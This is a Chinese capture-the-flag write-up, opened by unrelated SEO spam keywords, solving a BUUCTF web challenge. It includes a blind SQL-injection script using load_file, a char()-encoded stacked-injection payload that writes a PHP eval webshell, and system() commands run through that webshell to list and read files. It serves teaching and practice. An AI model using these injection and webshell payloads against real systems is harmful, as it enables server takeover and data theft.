铁岭手机网站建设,红花岗区住房和城乡建设局网站,京东网上商城女装,自营购物网站建设打开界面#xff0c;全部点击一遍#xff0c;只有注册和登录功能可以使用注册一个账号#xff0c;注册admin提示用户存在#xff0c;可能有二次注入#xff0c;注册admin自动加了一个字符#xff0c;无法二次注入#xff0c;点击其他功能点换浏览器重新登录后#xff0…打开界面全部点击一遍只有注册和登录功能可以使用注册一个账号注册admin提示用户存在可能有二次注入注册admin自动加了一个字符无法二次注入点击其他功能点换浏览器重新登录后各个功能点无法点击点击用户信息当id2显示以下界面将结合下面的文件上传利用测试id1显示如下界面点击编辑图片看到有上传文件点将结合上面的sql注入利用上传一个webshell看看抓包进行绕过修改一下后缀名文件上传成功虽然在bp绕过后缀名还是为jpg上传点目前没啥用从注入点进行操作尝试读文件import requests
cookies {PHPSESSID:jiadkkr16f4o0spgp88tued137
}
data0x
flag
rrequests.session()
for i in range(9999):for i in range(1,127):#print (i)urlhttp://9d09a1ad-3f91-41b5-9e7f-913c17681937.node4.buuoj.cn:81/user/user.php?id0^(hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870))datastr(hex(i)).replace(0x,))resultr.get(urlurl,cookiescookies).textif admin in result:datastr(hex(i-1)).replace(0x,)flag(chr(i-1))print (flag)break
print(data)
可以读/var/www/html/index.php文件读取/var/www/html/user/user.php文件这种方法跑十几分钟也跑不出来看了大佬的wp得知在/var/www/html/user/user.php中是用mysqli_multi_query()函数进行sql语句查询mysqli_multi_query() 执行的sql语句其可以执行一个或多个针对数据库的查询多个查询用分号进行分隔也就存在堆叠注入。已知存在注入点且/favicon目录存在写权限利用sql语句对目标目录写木马存在各种限制selectunion直接用char绕过太菜用其他绕过写马失败感觉以上不知道对做题影响不大知道是堆叠注入和利用sql对目录写文件的思路就可以原语句为select ‘?php eval($_POST[_]);?’ into outfile ‘/var/www/html/favicon/shell.php’;通过char及绕过的语句为脚本如下strselect ?php eval($_POST[_]);? into outfile /var/www/html/favicon/shell.php;
len_strlen(str)
for i in range(0,len_str):if i 0:print(char(%s%ord(str[i]),end)else:print(,%s%ord(str[i]),end)
print())?id2;set sqlchar(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from sql;execute query;进行注入页面显示webshell执行对_参数进行传参payload为_system(cd /;ls);看到一个文件为WelL_Th1s_14_fl4g去读取这个文件payload为_system(cd /;cat WelL_Th1s_14_fl4g );得到flagflag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503} 删删改改四五回哥们只是想混个勋章太折磨人了看到我文章有罗里吧嗦的地方见谅我其他文章都是以精简为主不在乎文章分数为了这个勋章我只好车轱辘话转来转去这一段就是这个作用终于70分了拿个女神勋章真难啊
